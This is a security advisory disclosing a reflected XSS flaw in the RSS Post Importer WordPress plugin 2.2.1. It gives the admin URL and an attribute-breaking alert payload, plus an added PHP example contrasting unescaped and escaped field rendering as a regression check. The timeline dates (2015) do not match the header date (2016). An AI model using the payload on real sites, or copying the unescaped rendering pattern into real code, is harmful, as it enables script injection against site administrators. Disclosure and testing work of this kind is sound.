RSS Post Importer XSS Vulnerability

## FULL DISCLOSURE

#Product : RSS Post Importer
#Exploit Author : Rahul Pratap Singh
#Version : 2.2.1
#Home page Link : https://wordpress.org/plugins/rss-post-importer/
#Website : 0x62626262.wordpress.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Date : 30/Jan/2016

XSS Vulnerability:

—————————————-
Description:
—————————————-
The “full text RSS feed api key” parameter is not sanitized, which leads to reflected XSS.

—————————————-
Exploit:
—————————————-
1) Go to the following URL.
http://localhost/wp-admin/options-general.php?page=rss_pi&version=2.2.1&type=premium

2) Paste the following payload in “full text RSS feed api key” input field.

” autofocus onclick=alert(/XSS/) ”

—————————————-
POC:
—————————————-
[Screenshot: RSSFeedApiXSSPOC]

Fix:
Update to 2.2.3
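
The bug class described above, shown as an added example (not the plugin's code and not the vendor's patch). The field name `api_key`, the markup and the function names are hypothetical, and a stand-in for WordPress's `esc_attr()` is defined so the file runs outside WordPress. It renders the settings field with and without attribute escaping, then parses the result to list which attributes the browser would actually see.

```php
<?php
// Added example: hypothetical field name and markup, not taken from the plugin.

// Stand-in for WordPress's esc_attr() so this runs outside WordPress.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}

// Vulnerable pattern: the submitted value is written into value="..." as-is.
function render_key_field_unsafe($value) {
    return '<input type="text" name="api_key" value="' . $value . '">';
}

// Hardened pattern: the value is escaped for the HTML attribute context.
function render_key_field_safe($value) {
    return '<input type="text" name="api_key" value="' . esc_attr($value) . '">';
}

// Parse rendered markup and return the attribute names on the <input> element.
function input_attribute_names($html) {
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate parser warnings on odd markup
    $doc->loadHTML($html);
    libxml_clear_errors();
    $names = [];
    foreach ($doc->getElementsByTagName('input')->item(0)->attributes as $attr) {
        $names[] = $attr->name;
    }
    sort($names);
    return $names;
}

// Constructed input: the value quoted in this advisory, with plain double quotes.
$submitted = '" autofocus onclick=alert(/XSS/) "';
$expected  = ['name', 'type', 'value'];

$renderers = ['unsafe' => 'render_key_field_unsafe', 'safe' => 'render_key_field_safe'];
foreach ($renderers as $label => $fn) {
    $attrs = input_attribute_names($fn($submitted));
    // Any attribute outside the expected set means the value escaped its quotes.
    $extra = array_values(array_diff($attrs, $expected));
    printf("%-6s attributes: %s | injected: %s\n", $label,
        implode(',', $attrs), $extra ? implode(',', $extra) : 'none');
}
```

The same attribute-set comparison can serve as a regression test for any settings page that echoes stored or submitted values into form fields.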

Vulnerability Disclosure Timeline:
→ January 18, 2015  – Bug discovered, initial report to WordPress
→ January 19, 2015  – WordPress Response, plugin taken down
→ January 27, 2015  – Vendor Deployed a Patch

#######################################
#                    CTG SECURITY SOLUTIONS                          #
#                www.ctgsecuritysolutions.com                        #
#######################################

Pub Ref:
https://wordpress.org/plugins/rss-post-importer/changelog/
